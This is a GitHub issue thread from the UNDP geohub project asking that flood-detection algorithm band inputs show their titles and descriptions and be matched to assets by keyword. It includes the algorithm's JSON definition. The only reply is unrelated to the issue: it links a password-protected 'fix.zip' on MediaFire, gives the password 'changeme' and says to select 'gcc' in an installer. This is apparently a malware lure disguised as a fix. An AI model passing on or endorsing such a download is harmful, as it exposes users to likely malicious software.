### ISSUE TITLE
[BUG] select asset automatically by using keyword of algorithm

### ISSUE THREAD

**Issue by JinIgarashi** [UNDP-Data/geohub#4007]
### Bug Description

https://titiler.undpgeohub.org/algorithms/flood_detection

Input band has `title` and `description`. These information should be shown on the above select box instead of useless title like `Please select asset 1`.

```json
{
  "title": "Flood detection ",
  "description": "Algorithm to calculate Modified Normalized Difference Water Index (MNDWI), and apply Otsu thresholding algorithm to identify surface water",
  "inputs": {
    "nbands": 2,
    "bands": [
      {
        "title": "Green band",
        "description": "The green band with the wavelength between 0.53µm - 0.59µm",
        "required": true,
        "keywords": [
          "green",
          "b3"
        ]
      },
      {
        "title": "Short wave infrared band",
        "description": "The SWIR band with wavelength between 0.9μ – 1.7μm",
        "required": true,
        "keywords": [
          "swir",
          "b6"
        ]
      }
    ],
    "description": "The bands that will be used to make this calculation"
  },
  "outputs": {
    "nbands": 1,
    "dtype": null,
    "min": [
      -1
    ],
    "max": [
      1
    ],
    "colormap_name": "viridis",
    "description": "The output is a binary image where 1 represents water and 0 represents non-water"
  },
  "parameters": {}
}

```

also, use keyword to match band name automatically. RCA is doing this in the below code.

https://github.com/UNDP-Data/geohub/blob/c27c7ac0f551f35642d319fa50cb68f098631cae/sites/geohub/src/components/util/stac/StacCatalogDatePicker.svelte#L149-L170

### Bug Reproduction

![image](https://github.com/user-attachments/assets/d0e669d5-89b1-415b-9214-f71888876843)

### Bug System Information

- OS: [e.g. Windows 10]
- Browser: [e.g. Google Chrome, Firefox]

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
